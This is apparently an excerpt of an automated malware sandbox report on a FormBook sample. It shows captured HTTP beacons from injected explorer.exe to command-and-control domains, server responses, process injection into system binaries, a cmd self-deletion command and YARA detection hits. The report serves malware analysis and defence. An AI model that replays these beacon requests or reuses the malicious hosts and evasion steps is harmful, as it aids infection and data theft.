                                                            Data Raw: 34 66 39 31 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4b 58 37 34 69 78 70 7a 56 79 58 62 4a 70 72 63 4c 66 62 48 34 70 73 50 34 2b 4c 32 65 6e 74 71 72 69 30 6c 7a 68 36 70 6b 41 61 58 4c 50 49 63 63 6c 76 36 44 51 42 65 4a 4a 6a 47 46 57 72 42 49 46 36 51 4d 79 46 77 58 54 35 43 43 52 79 6a 53 32 70 65 6e 45 43 41 77 45 41 41 51 3d 3d 5f 42 76 6d 6f 45 31 59 46 43 6d 2b 74 42 4e 35 32 53 69 74 4c 54 71 64 54 56 4f 2b 62 2f 4d 4e 6e 4f 4d 53 36 62 7a 54 34 46 64 41 72 69 4f 65 2f 52 6c 6b 65 41 58 61 65 53 62 6f 68 6d 41 62 6c 56 6b 66 5a 38 6b 57 53 58 37 56 36 57 75 6e 44 79 52 72 69 55 51 3d 3d 22 3e 0d 0a 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 76 61 72 20 61 62 70 3b 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 76 69 6e 74 61 67 65 70 61 73 65 6f 2e 63 6f 6d 2f 70 78 2e 6a 73 3f 63 68 3d 31 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 76 69 6e 74 61 67 65 70 61 73 65 6f 2e 63 6f 6d 2f 70 78 2e 6a 73 3f 63 68 3d 32 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 66 75 6e 63 74 69 6f 6e 20 68 61 6e 64 6c 65 41 42 50 44 65 74 65 63 74 28 29 7b 74 72 79 7b 69 66 28 21 61 62 70 29 20 72 65 74 75 72 6e 3b 76 61 72 20 69 6d 67 6c 6f 67 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 69 6d 67 22 29 3b 69 6d 67 6c 6f 67 2e 73 74 79 6c 65 2e 68 65 69 67 68 74 3d 22 30 70 78 22 3b 69 6d 67 6c 6f
                                                            Data Ascii: 4f91<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAKX74ixpzVyXbJprcLfbH4psP4+L2entqri0lzh6pkAaXLPIcclv6DQBeJJjGFWrBIF6QMyFwXT5CCRyjS2penECAwEAAQ==_BvmoE1YFCm+tBN52SitLTqdTVO+b/MNnOMS6bzT4FdAriOe/RlkeAXaeSbohmAblVkfZ8kWSX7V6WunDyRriUQ=="><head><script type="text/javascript">var abp;</script><script type="text/javascript" src="http://www.vintagepaseo.com/px.js?ch=1"></script><script type="text/javascript" src="http://www.vintagepaseo.com/px.js?ch=2"></script><script type="text/javascript">function handleABPDetect(){try{if(!abp) return;var imglog = document.createElement("img");imglog.style.height="0px";imglo


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            1192.168.2.649826217.160.0.22680C:\Windows\explorer.exe
                                                            TimestampkBytes transferredDirectionData
                                                            Oct 13, 2021 13:39:16.181458950 CEST6077OUTGET /mexq/?e66HNDO=aPMuX7G1Ot9XJXghMAabXwwkzBWzprGcmmQ5cfrgMP5E/C43hf1Uz5bqYekFv+cUss1JtU0p5g==&6lux=TrTPmvux5 HTTP/1.1
                                                            Host: www.xn--aprendes-espaol-brb.com
                                                            Connection: close
                                                            Data Raw: 00 00 00 00 00 00 00
                                                            Data Ascii:
                                                            Oct 13, 2021 13:39:16.395705938 CEST6078INHTTP/1.1 301 Moved Permanently
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: close
                                                            Date: Wed, 13 Oct 2021 11:39:16 GMT
                                                            Server: Apache
                                                            X-Powered-By: PHP/7.4.24
                                                            Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                            Cache-Control: no-cache, must-revalidate, max-age=0
                                                            X-Redirect-By: WordPress
                                                            Location: http://xn--aprendes-espaol-brb.com/mexq/?e66HNDO=aPMuX7G1Ot9XJXghMAabXwwkzBWzprGcmmQ5cfrgMP5E/C43hf1Uz5bqYekFv+cUss1JtU0p5g==&6lux=TrTPmvux5
                                                            Data Raw: 30 0d 0a 0d 0a
                                                            Data Ascii: 0


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            2192.168.2.649827154.216.110.14980C:\Windows\explorer.exe
                                                            TimestampkBytes transferredDirectionData
                                                            Oct 13, 2021 13:39:28.079721928 CEST6079OUTGET /mexq/?e66HNDO=g6L0/Z2eA1jwRGo1l6rXBhzWGtzMcF3Ol1vrZIbNMV/6CHuR9YyStXwolwULrpYmw34wy4pkGQ==&6lux=TrTPmvux5 HTTP/1.1
                                                            Host: www.cyebang.com
                                                            Connection: close
                                                            Data Raw: 00 00 00 00 00 00 00
                                                            Data Ascii:
                                                            Oct 13, 2021 13:39:28.372508049 CEST6081INHTTP/1.1 200 OK
                                                            Content-Type: text/html; charset=UTF-8
                                                            Server: Microsoft-IIS/8.5
                                                            X-Powered-By: PHP/5.6.40
                                                            X-Powered-By: ASP.NET
                                                            Date: Wed, 13 Oct 2021 11:39:24 GMT
                                                            Connection: close
                                                            Content-Length: 1245
                                                            Data Raw: 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 2f 66 61 76 69 63 6f 6e 2e 69 63 6f 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 2f 3e 0d 0a 3c 74 69 74 6c 65 3e e4 b9 9d e6 b8 b8 e4 bc 9a e5 a4 87 e7 94 a8 e7 bd 91 e5 9d 80 5f e9 a6 96 e9 a1 b5 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e 74 3d 22 e4 b9 9d e6 b8 b8 e4 bc 9a e5 a4 87 e7 94 a8 e7 bd 91 e5 9d 80 5f e9 a6 96 e9 a1 b5 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 63 6f 6e 74 65 6e 74 3d 22 e4 b9 9d e6 b8 b8 e4 bc 9a e5 a4 87 e7 94 a8 e7 bd 91 e5 9d 80 5f e9 a6 96 e9 a1 b5 22 3e 0d 0a 3c 6d 65 74 61 20 69 64 3d 22 76 69 65 77 70 6f 72 74 22 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 2c 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 2c 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 6e 6f 22 3e 0d 0a 3c 73 63 72 69 70 74 3e 0d 0a 76 61 72 20 5f 68 6d 74 20 3d 20 5f 68 6d 74 20 7c 7c 20 5b 5d 3b 0d 0a 28 66 75 6e 63 74 69 6f 6e 28 29 20 7b 0d 0a 20 20 76 61 72 20 68 6d 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 73 63 72 69 70 74 22 29 3b 0d 0a 20 20 68 6d 2e 73 72 63 20 3d 20 22 68 74 74 70 73 3a 2f 2f 68 6d 2e 62 61 69 64 75 2e 63 6f 6d 2f 68 6d 2e 6a 73 3f 38 35 31 38 36 36 39 66 30 64 33 31 65 34 31 35 30 38 62 65 30 62 61 62 66 35 61 38 66 63 32 38 22 3b 0d 0a 20 20 76 61 72 20 73 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 28 22 73 63 72 69 70 74 22 29 5b 30 5d 3b 20 0d 0a 20 20 73 2e 70 61 72 65 6e 74 4e 6f 64 65 2e 69 6e 73 65 72 74 42 65 66 6f 72 65 28 68 6d 2c 20 73 29 3b 0d 0a 7d 29 28 29 3b 0d 0a 3c 2f 73 63 72 69 70 74 3e 0d 0a 20 20 3c 73 63 72 69 70 74 3e 0d 0a 28 66 75 6e 63 74 69 6f 6e 28 29 7b 0d 0a 20 20 20 20 76 61 72 20 62 70 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 27 73 63 72 69 70 74 27 29 3b 0d 0a 20 20 20 20 76 61 72 20 63 75 72 50 72 6f 74 6f 63 6f 6c 20 3d 20 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 70 72 6f 74 6f 63 6f 6c 2e 73 70 6c 69 74 28 27 3a 27 29 5b 30 5d 3b 0d 0a 20 20 20 20 69 66 20 28 63 75 72 50 72 6f 74 6f 63 6f 6c 20 3d 3d 3d 20 27 68 74 74 70 73 27 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 62 70 2e 73 72 63 20 3d 20 27 68 74 74 70 73 3a 2f 2f 7a 7a 2e 62 64 73 74 61 74 69 63 2e 63 6f 6d 2f 6c 69 6e 6b 73 75 62 6d 69 74 2f 70 75 73 68 2e 6a 73 27 3b 0d 0a 20 20 20 20 7d 0d 0a 20 20 20 20 65 6c 73 65 20 7b 0d 0a 20 20 20 20 20 20 20 20 62 70 2e 73 72 63 20 3d 20 27 68 74 74 70 3a 2f 2f 70 75 73 68 2e 7a 68 61 6e 7a 68 61 6e 67 2e 62 61 69 64 75 2e 63 6f 6d 2f 70 75 73 68 2e 6a 73 27 3b 0d 0a 20 20 20 20 7d 0d 0a 20 20 20 20 76 61 72 20 73 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 28 22 73 63 72 69 70 74 22 29 5b 30 5d 3b 0d 0a 20 20 20 20 73 2e 70 61 72 65 6e 74 4e 6f 64 65 2e 69 6e 73 65 72 74 42 65 66 6f 72 65 28 62 70 2c 20 73 29 3b 0d 0a
                                                            Data Ascii: <!DOCTYPE html><html><head><meta charset="utf-8"><link rel="icon" href="/favicon.ico" type="image/x-icon"/><title>_</title><meta name="keywords" content="_"> <meta name="description"content="_"><meta id="viewport" name="viewport" content="width=device-width,minimum-scale=1.0,maximum-scale=1.0,user-scalable=no"><script>var _hmt = _hmt || [];(function() { var hm = document.createElement("script"); hm.src = "https://hm.baidu.com/hm.js?8518669f0d31e41508be0babf5a8fc28"; var s = document.getElementsByTagName("script")[0]; s.parentNode.insertBefore(hm, s);})();</script> <script>(function(){ var bp = document.createElement('script'); var curProtocol = window.location.protocol.split(':')[0]; if (curProtocol === 'https') { bp.src = 'https://zz.bdstatic.com/linksubmit/push.js'; } else { bp.src = 'http://push.zhanzhang.baidu.com/push.js'; } var s = document.getElementsByTagName("script")[0]; s.parentNode.insertBefore(bp, s);


                                                            Code Manipulations

                                                            Statistics

                                                            Behavior

                                                            Click to jump to process

                                                            System Behavior

                                                            General

                                                            Start time:13:37:28
                                                            Start date:13/10/2021
                                                            Path:C:\Users\user\Desktop\iAuPyHuUkk.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:'C:\Users\user\Desktop\iAuPyHuUkk.exe'
                                                            Imagebase:0xf00000
                                                            File size:698880 bytes
                                                            MD5 hash:6040407905EA1AA24DD58DC8BEFA4255
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:.Net C# or VB.NET
                                                            Yara matches:
                                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.371245810.00000000043C9000.00000004.00000001.sdmp, Author: Joe Security
                                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.371245810.00000000043C9000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.371245810.00000000043C9000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                            • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000002.370703013.00000000033F7000.00000004.00000001.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000002.370638895.00000000033C1000.00000004.00000001.sdmp, Author: Joe Security
                                                            Reputation:low

                                                            General

                                                            Start time:13:37:37
                                                            Start date:13/10/2021
                                                            Path:C:\Users\user\Desktop\iAuPyHuUkk.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:C:\Users\user\Desktop\iAuPyHuUkk.exe
                                                            Imagebase:0xbc0000
                                                            File size:698880 bytes
                                                            MD5 hash:6040407905EA1AA24DD58DC8BEFA4255
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Yara matches:
                                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000002.455602320.0000000001930000.00000040.00020000.sdmp, Author: Joe Security
                                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000002.455602320.0000000001930000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000002.455602320.0000000001930000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000002.454131267.00000000015D0000.00000040.00020000.sdmp, Author: Joe Security
                                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000002.454131267.00000000015D0000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000002.454131267.00000000015D0000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000002.453689507.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000002.453689507.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000002.453689507.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                            Reputation:low

                                                            General

                                                            Start time:13:37:38
                                                            Start date:13/10/2021
                                                            Path:C:\Windows\explorer.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\Explorer.EXE
                                                            Imagebase:0x7ff6f22f0000
                                                            File size:3933184 bytes
                                                            MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Yara matches:
                                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000000.400507122.00000000075B9000.00000040.00020000.sdmp, Author: Joe Security
                                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000000.400507122.00000000075B9000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000000.400507122.00000000075B9000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000000.421546178.00000000075B9000.00000040.00020000.sdmp, Author: Joe Security
                                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000000.421546178.00000000075B9000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000000.421546178.00000000075B9000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                            Reputation:high

                                                            General

                                                            Start time:13:38:07
                                                            Start date:13/10/2021
                                                            Path:C:\Windows\SysWOW64\autofmt.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\SysWOW64\autofmt.exe
                                                            Imagebase:0x12e0000
                                                            File size:831488 bytes
                                                            MD5 hash:7FC345F685C2A58283872D851316ACC4
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:moderate

                                                            General

                                                            Start time:13:38:14
                                                            Start date:13/10/2021
                                                            Path:C:\Windows\SysWOW64\control.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:C:\Windows\SysWOW64\control.exe
                                                            Imagebase:0xd20000
                                                            File size:114688 bytes
                                                            MD5 hash:40FBA3FBFD5E33E0DE1BA45472FDA66F
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Yara matches:
                                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000D.00000002.619163959.0000000002FE0000.00000040.00020000.sdmp, Author: Joe Security
                                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000D.00000002.619163959.0000000002FE0000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000D.00000002.619163959.0000000002FE0000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000D.00000002.619272890.0000000003010000.00000004.00000001.sdmp, Author: Joe Security
                                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000D.00000002.619272890.0000000003010000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000D.00000002.619272890.0000000003010000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000D.00000002.617454019.00000000009B0000.00000040.00020000.sdmp, Author: Joe Security
                                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000D.00000002.617454019.00000000009B0000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000D.00000002.617454019.00000000009B0000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                            Reputation:moderate

                                                            General

                                                            Start time:13:38:18
                                                            Start date:13/10/2021
                                                            Path:C:\Windows\SysWOW64\cmd.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:/c del 'C:\Users\user\Desktop\iAuPyHuUkk.exe'
                                                            Imagebase:0x2a0000
                                                            File size:232960 bytes
                                                            MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high

                                                            General

                                                            Start time:13:38:19
                                                            Start date:13/10/2021
                                                            Path:C:\Windows\System32\conhost.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                            Imagebase:0x7ff61de10000
                                                            File size:625664 bytes
                                                            MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high

                                                            Disassembly

                                                            Code Analysis

                                                            Reset < >